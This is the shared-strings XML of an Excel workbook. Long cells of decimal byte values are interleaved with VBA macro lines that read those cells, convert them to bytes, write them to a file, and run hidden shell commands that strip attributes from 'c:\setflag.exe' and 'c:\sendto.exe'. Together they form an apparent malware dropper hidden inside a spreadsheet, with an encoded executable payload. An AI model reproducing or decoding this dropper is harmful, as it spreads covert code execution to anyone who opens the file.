129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
